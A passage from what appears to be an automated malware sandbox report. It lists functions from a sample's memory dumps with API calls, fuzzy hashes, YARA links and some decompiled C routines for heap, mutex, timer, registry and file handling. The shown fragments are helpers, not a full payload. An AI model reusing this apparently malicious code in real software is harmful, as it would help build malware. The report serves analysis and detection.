                              • Opcode Fuzzy Hash: 6e7609b1a8b6077261975ac0e7dc84fb8a82b64256ad678f99b5c5dcb73b1033
                              • Instruction Fuzzy Hash: 158106B1D0022ADFCF11DFA8D9809EDBBB9BF48714F10816AF459AB250D7759A41CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102DCEE, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0102DD78
                              • lstrlen.KERNEL32(?,?), ref: 0102DDA9
                              • memcpy.NTDLL(00000008,?,00000001), ref: 0102DDB8
                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 0102DE37
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreelstrlenmemcpy
                              • String ID: W
                              • API String ID: 379260646-655174618
                              • Opcode ID: fa1eff425532a7d88d10512cdf8dc9bec00ea52e8b25a94add698a8fe662e46c
                              • Instruction ID: 4e9b0f6146ee921e27ee9484a5f01ca8ceb9d39617df85daf14b7380178b9f4c
                              • Opcode Fuzzy Hash: fa1eff425532a7d88d10512cdf8dc9bec00ea52e8b25a94add698a8fe662e46c
                              • Instruction Fuzzy Hash: B141E170500A1AEBDB75AF9CD8847EA7BFAAF54340F40846AE9C98B214C3349885CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0104467F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON
                              Download Yara Rule
                              APIs
                              • memset.NTDLL ref: 0104472A
                              • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 01044791
                              • GetLastError.KERNEL32(?,00000000,00000000), ref: 0104479B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: BuffersErrorFileFlushLastmemset
                              • String ID: K$P
                              • API String ID: 3817869962-420285281
                              • Opcode ID: ca3d86f610ca0cbebdcf2ab9d67667e9d3f288039a241b49d52a01e8b3af7770
                              • Instruction ID: c47cb90d3eb39c3a64fad32ed7ce65ba07f6a85ad5e087ea49ef9085d280dace
                              • Opcode Fuzzy Hash: ca3d86f610ca0cbebdcf2ab9d67667e9d3f288039a241b49d52a01e8b3af7770
                              • Instruction Fuzzy Hash: DF4178B0A00B459FDB61CFA8C9847AEBBF5FF19204F56496DD5C6D3680E338A905CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01021477, Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON
                              Download Yara Rule
                              APIs
                              • memcpy.NTDLL(?,010412DD,00000000,?,?,?,010412DD,?,?,?,?,?), ref: 010214B5
                              • lstrlen.KERNEL32(010412DD,?,?,?,010412DD,?,?,?,?,?), ref: 010214D3
                              • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 01021542
                              • lstrlen.KERNEL32(010412DD,00000000,00000000,?,?,?,010412DD,?,?,?,?,?), ref: 01021563
                              • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 01021577
                              • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 01021580
                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0102158E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlenmemcpy$FreeLocal
                              • String ID:
                              • API String ID: 1123625124-0
                              • Opcode ID: ffcc62ac9e6794f2b1d91ee7d1f09104cb64f4d420ac5340ef11baefdc3fc94a
                              • Instruction ID: 590881016ee02a22763e057c126ba2d7684d452c112771744c3bdf0c65ca41ef
                              • Opcode Fuzzy Hash: ffcc62ac9e6794f2b1d91ee7d1f09104cb64f4d420ac5340ef11baefdc3fc94a
                              • Instruction Fuzzy Hash: 664107B680022AEBDF109F68DD818DF3FA8EF142A4B044466FD59A7110E731DA208BE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E4D70, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 37%
                              			E013E4D70() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x13ed35c; // 0x3ad95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x13ed35c; // 0x3ad95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x13ed35c; // 0x3ad95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x13ee823) {
					HeapFree( *0x13ed270, 0, _t10);
					_t7 =  *0x13ed35c; // 0x3ad95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                              0x013e4d70
                              0x013e4d79
                              0x013e4d89
                              0x013e4d89
                              0x013e4d8e
                              0x013e4d93
                              0x00000000
                              0x00000000
                              0x013e4d83
                              0x013e4d83
                              0x013e4d95
                              0x013e4d9a
                              0x013e4d9e
                              0x013e4db1
                              0x013e4db7
                              0x013e4db7
                              0x013e4dc0
                              0x013e4dc2
                              0x013e4dc6
                              0x013e4dcc

                              APIs
                              • RtlEnterCriticalSection.NTDLL(03AD9570), ref: 013E4D79
                              • Sleep.KERNEL32(0000000A), ref: 013E4D83
                              • HeapFree.KERNEL32(00000000), ref: 013E4DB1
                              • RtlLeaveCriticalSection.NTDLL(03AD9570), ref: 013E4DC6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID: Uxt
                              • API String ID: 58946197-1536154274
                              • Opcode ID: 040e656a037784c630000671ec035db4e3137e0cb8ee7e43eadedc86910c3e2f
                              • Instruction ID: 7a847a0a742dd3c076aef7f778006637ccced60e9f47a4682b38db890cd017ed
                              • Opcode Fuzzy Hash: 040e656a037784c630000671ec035db4e3137e0cb8ee7e43eadedc86910c3e2f
                              • Instruction Fuzzy Hash: F5F0DA782003409BEB399BA4D849B6A7BFCBB09708F088019E902CF3D5C631EC04CB10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102226A, Relevance: 7.7, APIs: 6, Instructions: 171stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0102DE50: ExpandEnvironmentStringsW.KERNEL32(761506E0,00000000,00000000,761506E0,00000020,80000001,01022289,?,761506E0), ref: 0102DE61
                                • Part of subcall function 0102DE50: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 0102DE7E
                              • lstrlenW.KERNEL32(?,00000000,00000020,80000001,?,761506E0), ref: 010222B6
                              • lstrlenW.KERNEL32(00000008), ref: 010222BD
                              • lstrlenW.KERNEL32(?,?), ref: 010222DB
                              • lstrlen.KERNEL32(00000000,?,00000000), ref: 01022399
                              • lstrlenW.KERNEL32(?), ref: 010223A4
                              • wsprintfA.USER32 ref: 010223E6
                                • Part of subcall function 010469F0: RtlFreeHeap.NTDLL(00000000,?,010262C2,00000000), ref: 010469FC
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,010223FB,00000000,010223FC,00000080,00000000,00000000,01048BAA,747869A0,010223FB,?), ref: 01026DDA
                                • Part of subcall function 01026D99: GetLastError.KERNEL32 ref: 01026DE4
                                • Part of subcall function 01026D99: WaitForSingleObject.KERNEL32(000000C8), ref: 01026E09
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 01026E2A
                                • Part of subcall function 01026D99: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 01026E52
                                • Part of subcall function 01026D99: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 01026E67
                                • Part of subcall function 01026D99: SetEndOfFile.KERNEL32(00000001), ref: 01026E74
                                • Part of subcall function 01026D99: CloseHandle.KERNEL32(00000001), ref: 01026E8C
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                              • String ID:
                              • API String ID: 1727939831-0
                              • Opcode ID: 032d070676a7c284894674b4f2468908b4acc011820243528a584585f38166df
                              • Instruction ID: 38fdd6353262a36f070997121514bd5e91bd535d77ba3b00d2e1f6a9a3571e1a
                              • Opcode Fuzzy Hash: 032d070676a7c284894674b4f2468908b4acc011820243528a584585f38166df
                              • Instruction Fuzzy Hash: AF514BB690021AAFDF11EFA8DC849EE7BBDBF44300B048065F994E7214DB76D911DB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010400E2, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • lstrcpy.KERNEL32(?,00000020), ref: 010401DF
                              • lstrcat.KERNEL32(?,00000020), ref: 010401F4
                              • lstrcmp.KERNEL32(00000000,?), ref: 0104020B
                              • lstrlen.KERNEL32(?,?,D448B889,00000000,69B25F44), ref: 0104022F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                              • String ID:
                              • API String ID: 3214092121-3916222277
                              • Opcode ID: ac8c1fd36c07c16fb53848c05c3d25ccd810d4af1b1952fa3823030d31351947
                              • Instruction ID: 738815817b32682fa40701fdb23308647e67118d0c13f75233563397342a273a
                              • Opcode Fuzzy Hash: ac8c1fd36c07c16fb53848c05c3d25ccd810d4af1b1952fa3823030d31351947
                              • Instruction Fuzzy Hash: F251A5B1A00118EFDB21CF98C9C46EDBBF5FF45314F0480AAFA95AB259C7719A01CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013EA90C, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                              Download Yara Rule
                              C-Code - Quality: 22%
                              			E013EA90C(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E013E55DC(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E013E6DFA(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E013E55DC((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x13ed2b0 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                              0x013ea913
                              0x013ea91a
                              0x013ea91f
                              0x013ea922
                              0x013ea929
                              0x013ea92c
                              0x013ea92f
                              0x013ea936
                              0x013ea939
                              0x013eaa8d
                              0x013eaa8f
                              0x013eaa91
                              0x013eaa96
                              0x013eaa96
                              0x013ea93f
                              0x013ea942
                              0x013ea945
                              0x013ea947
                              0x013ea947
                              0x013ea94b
                              0x00000000
                              0x00000000
                              0x013ea94f
                              0x013ea97b
                              0x013ea980
                              0x013ea982
                              0x013ea982
                              0x013ea985
                              0x013ea988
                              0x013ea988
                              0x013ea98a
                              0x00000000
                              0x013ea955
                              0x013ea957
                              0x013ea976
                              0x013ea976
                              0x013ea98d
                              0x013ea98d
                              0x013ea98e
                              0x013ea98e
                              0x013ea991
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013ea991
                              0x013ea95b
                              0x013ea9a2
                              0x013ea9a6
                              0x013eaa80
                              0x013eaa82
                              0x013eaa82
                              0x013eaa83
                              0x013eaa86
                              0x00000000
                              0x013eaa86
                              0x013ea9af
                              0x013ea9c0
                              0x013ea9c4
                              0x013eaa7c
                              0x00000000
                              0x013eaa7c
                              0x013ea9ca
                              0x013ea9cd
                              0x013ea9d1
                              0x013ea9d7
                              0x013ea9da
                              0x013eaa72
                              0x013eaa72
                              0x00000000
                              0x013eaa78
                              0x013ea9e5
                              0x013ea9ee
                              0x013eaa02
                              0x013eaa09
                              0x013eaa1e
                              0x013eaa24
                              0x013eaa2c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013eaa2e
                              0x013eaa2e
                              0x013eaa2e
                              0x013eaa35
                              0x013eaa3d
                              0x00000000
                              0x00000000
                              0x013eaa3f
                              0x013eaa48
                              0x00000000
                              0x00000000
                              0x00000000
                              0x013eaa4a
                              0x013eaa4c
                              0x013eaa4f
                              0x013eaa4f
                              0x013eaa52
                              0x013eaa56
                              0x013eaa59
                              0x013eaa5f
                              0x013eaa62
                              0x013eaa69
                              0x00000000
                              0x013ea9e5
                              0x013ea960
                              0x013ea96b
                              0x013ea96e
                              0x013ea970
                              0x013ea970
                              0x013ea973
                              0x013ea975
                              0x00000000
                              0x013ea975
                              0x013ea94f
                              0x013ea995
                              0x013ea99a
                              0x013ea99c
                              0x013ea99c
                              0x013ea99f
                              0x013ea99f
                              0x00000000

                              APIs
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • lstrcpy.KERNEL32(69B25F45,00000020), ref: 013EAA09
                              • lstrcat.KERNEL32(69B25F45,00000020), ref: 013EAA1E
                              • lstrcmp.KERNEL32(00000000,69B25F45), ref: 013EAA35
                              • lstrlen.KERNEL32(69B25F45), ref: 013EAA59
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                              • String ID:
                              • API String ID: 3214092121-3916222277
                              • Opcode ID: b99c407d71ed870f08433fd5466f5060c8bf7fec23ebf78c8b8b6a045ef71bf4
                              • Instruction ID: 5003a2103d95ce7bb77025e5b0aa38ae4a64058358db2790bdcfa23da2b6ba08
                              • Opcode Fuzzy Hash: b99c407d71ed870f08433fd5466f5060c8bf7fec23ebf78c8b8b6a045ef71bf4
                              • Instruction Fuzzy Hash: 90519035A00328EBEF21CF99C5486ADBBF6EF45319F15805AE9559B281C7709A41CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01041BD5, Relevance: 7.6, APIs: 5, Instructions: 133registrysynchronizationthreadCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,00000000,747869A0,?,00000250,?,00000000), ref: 0103F68B
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?,?,00000000), ref: 0103F697
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F6DF
                                • Part of subcall function 0103F63F: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0103F6FA
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(0000002C), ref: 0103F732
                                • Part of subcall function 0103F63F: lstrlenW.KERNEL32(?), ref: 0103F73A
                                • Part of subcall function 0103F63F: memset.NTDLL ref: 0103F75D
                                • Part of subcall function 0103F63F: wcscpy.NTDLL ref: 0103F76F
                              • WaitForSingleObject.KERNEL32(00000000,?,04B39940,?,00000000,00000000,00000001), ref: 01041C7F
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 01041CB9
                              • RegCloseKey.ADVAPI32(?), ref: 01041CE5
                              • WaitForSingleObject.KERNEL32(00000000), ref: 01041D49
                              • RtlExitUserThread.NTDLL(?), ref: 01041D7F
                                • Part of subcall function 010252BE: CreateFileW.KERNEL32(-00000007,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,?,?,?,01033518,00000000,?,?), ref: 010252DC
                                • Part of subcall function 010252BE: GetFileSize.KERNEL32(00000000,00000000,?,?,01033518,00000000,?,?,00000000,00000000,-00000007,01038E28,-00000007,?,?), ref: 010252EC
                                • Part of subcall function 010252BE: CloseHandle.KERNEL32(000000FF,?,?,01033518,00000000,?,?,00000000,00000000), ref: 0102534E
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,010223FB,00000000,010223FC,00000080,00000000,00000000,01048BAA,747869A0,010223FB,?), ref: 01026DDA
                                • Part of subcall function 01026D99: GetLastError.KERNEL32 ref: 01026DE4
                                • Part of subcall function 01026D99: WaitForSingleObject.KERNEL32(000000C8), ref: 01026E09
                                • Part of subcall function 01026D99: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 01026E2A
                                • Part of subcall function 01026D99: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 01026E52
                                • Part of subcall function 01026D99: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 01026E67
                                • Part of subcall function 01026D99: SetEndOfFile.KERNEL32(00000001), ref: 01026E74
                                • Part of subcall function 01026D99: CloseHandle.KERNEL32(00000001), ref: 01026E8C
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserWritewcscpy
                              • String ID:
                              • API String ID: 796380773-0
                              • Opcode ID: 08e195dc01d3e1d078d6178a1d9a5529313651c524a7f57ba483e08b142c3a5c
                              • Instruction ID: 997fe0cd9102560b40fe1c021eb97f4f035e87f70a493883615ce4fb0d3e9b43
                              • Opcode Fuzzy Hash: 08e195dc01d3e1d078d6178a1d9a5529313651c524a7f57ba483e08b142c3a5c
                              • Instruction Fuzzy Hash: EF514FB5A00209AFDB21DFA8C9C4EEE77FDEB08300F040066F694E7295D775AA44CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01027FC9, Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(?,-0105010C,00000000,010489BB), ref: 01027FEB
                              • lstrlenW.KERNEL32(?,-0105010C,00000000,010489BB), ref: 01027FFC
                              • lstrlenW.KERNEL32(?,-0105010C,00000000,010489BB), ref: 0102800E
                              • lstrlenW.KERNEL32(?,-0105010C,00000000,010489BB), ref: 01028020
                              • lstrlenW.KERNEL32(?,-0105010C,00000000,010489BB), ref: 01028032
                              • lstrlenW.KERNEL32(?,-0105010C,00000000,010489BB), ref: 0102803E
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: lstrlen
                              • String ID:
                              • API String ID: 1659193697-0
                              • Opcode ID: 170fcafe0b55252848618577144821c2f40327483178d47416f4432196885457
                              • Instruction ID: a0569d22a378ed6be04f9f67bc3e0ef121a60fcc32ce12f0cff9f3a971d06565
                              • Opcode Fuzzy Hash: 170fcafe0b55252848618577144821c2f40327483178d47416f4432196885457
                              • Instruction Fuzzy Hash: E2414275E00219AFDBA4DFA9C8C4A6EB7F9BF88204B14C86EE595E3201D774D9048B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 01028BF0, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0103DC2A: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 0103DC36
                                • Part of subcall function 0103DC2A: SetLastError.KERNEL32(000000B7,?,01028C04), ref: 0103DC47
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 01028C24
                              • CloseHandle.KERNEL32(00000000), ref: 01028CFC
                                • Part of subcall function 0103D4BA: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0103D4D4
                                • Part of subcall function 0103D4BA: CreateWaitableTimerA.KERNEL32(01050244,00000003,?), ref: 0103D4F1
                                • Part of subcall function 0103D4BA: GetLastError.KERNEL32(?,?,01028C58,?), ref: 0103D502
                                • Part of subcall function 0103D4BA: GetSystemTimeAsFileTime.KERNEL32(?,00000000,01028C58,?,?,?,01028C58,?), ref: 0103D542
                                • Part of subcall function 0103D4BA: SetWaitableTimer.KERNEL32(?,01028C58,00000000,00000000,00000000,00000000,?,?,01028C58,?), ref: 0103D561
                                • Part of subcall function 0103D4BA: HeapFree.KERNEL32(00000000,01028C58,00000000,01028C58,?,?,?,01028C58,?), ref: 0103D577
                              • GetLastError.KERNEL32(?), ref: 01028CE5
                              • ReleaseMutex.KERNEL32(00000000), ref: 01028CEE
                                • Part of subcall function 0103DC2A: CreateMutexA.KERNEL32(01050244,00000000,?,?,01028C04), ref: 0103DC5A
                              • GetLastError.KERNEL32 ref: 01028D09
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                              • String ID:
                              • API String ID: 1700416623-0
                              • Opcode ID: 9b0c44d0de7b7c6f627ca3d5aa6b9eeb19207bef3dad7e21e58c2bfbb918b909
                              • Instruction ID: 1c17f8c8635a9223abda366d21f7cfb021662b16651eb7ee19ea2e9faf806d15
                              • Opcode Fuzzy Hash: 9b0c44d0de7b7c6f627ca3d5aa6b9eeb19207bef3dad7e21e58c2bfbb918b909
                              • Instruction Fuzzy Hash: 1B3184B9A0020ADFDB219F79D9848AE7BFAFB95300B204467F9C2D7254EB758800CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102F2D6, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlImageNtHeader.NTDLL(?), ref: 0102F2EF
                                • Part of subcall function 01044BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,01023E20), ref: 01044BF0
                              • HeapFree.KERNEL32(00000000,?,?,?,00000001), ref: 0102F331
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000001), ref: 0102F383
                              • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,?,?,?,00000001), ref: 0102F39C
                                • Part of subcall function 0102122D: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0102124E
                                • Part of subcall function 0102122D: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,00000000), ref: 01021291
                              • GetLastError.KERNEL32 ref: 0102F3D4
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                              • String ID:
                              • API String ID: 1921436656-0
                              • Opcode ID: ef48b9b77c08ed592a0c76883f04795819fc0b72b22fcbd7242d0d753868f099
                              • Instruction ID: 5bb7297634c39fd9c7165c917835601904e67c8f0e0ded19d969e2c6a4e5565e
                              • Opcode Fuzzy Hash: ef48b9b77c08ed592a0c76883f04795819fc0b72b22fcbd7242d0d753868f099
                              • Instruction Fuzzy Hash: 3C3150B5A0022AEFDF61DFA8C980BAE7BF4EF08390F008055F985E7254D7759940CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103A132, Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0103A1B4
                              • lstrcpy.KERNEL32(00000000,?), ref: 0103A1CD
                              • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,00000000), ref: 0103A1DA
                              • lstrlen.KERNEL32(01051316,?,?,?,?,?,00000000,00000000,00000000), ref: 0103A1EC
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0103A21D
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                              • String ID:
                              • API String ID: 2734445380-0
                              • Opcode ID: faa1e37fb4283c178214f2724d6ee9421ffd6b31d0a60f74cf3a66208902a014
                              • Instruction ID: 018709e79dafb6675cfd8986e003f3f5cfa463252413dc9ebdc5344c7010a3da
                              • Opcode Fuzzy Hash: faa1e37fb4283c178214f2724d6ee9421ffd6b31d0a60f74cf3a66208902a014
                              • Instruction Fuzzy Hash: 02316BB5A00219EFDB11DF99DC88EEF7BB9EB44350F004564F98593200D7799911CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102A62A, Relevance: 7.6, APIs: 5, Instructions: 89memorystringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 01043C8A: RtlEnterCriticalSection.NTDLL(01050488), ref: 01043C92
                                • Part of subcall function 01043C8A: RtlLeaveCriticalSection.NTDLL(01050488), ref: 01043CA7
                                • Part of subcall function 01043C8A: InterlockedIncrement.KERNEL32(0000001C), ref: 01043CC0
                              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0102A661
                              • memcpy.NTDLL(00000000,?,?), ref: 0102A672
                              • lstrcmpi.KERNEL32(00000002,?), ref: 0102A6B8
                              • memcpy.NTDLL(00000000,?,?), ref: 0102A6CC
                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 0102A712
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                              • String ID:
                              • API String ID: 733514052-0
                              • Opcode ID: 620373d5defc596f9da7f3968789873972f83b4be86fc74adf2df95c957f4157
                              • Instruction ID: f596b429856e55fc2b456ceb85b8163060f9b507e4d5ccca1411e65e0510cc02
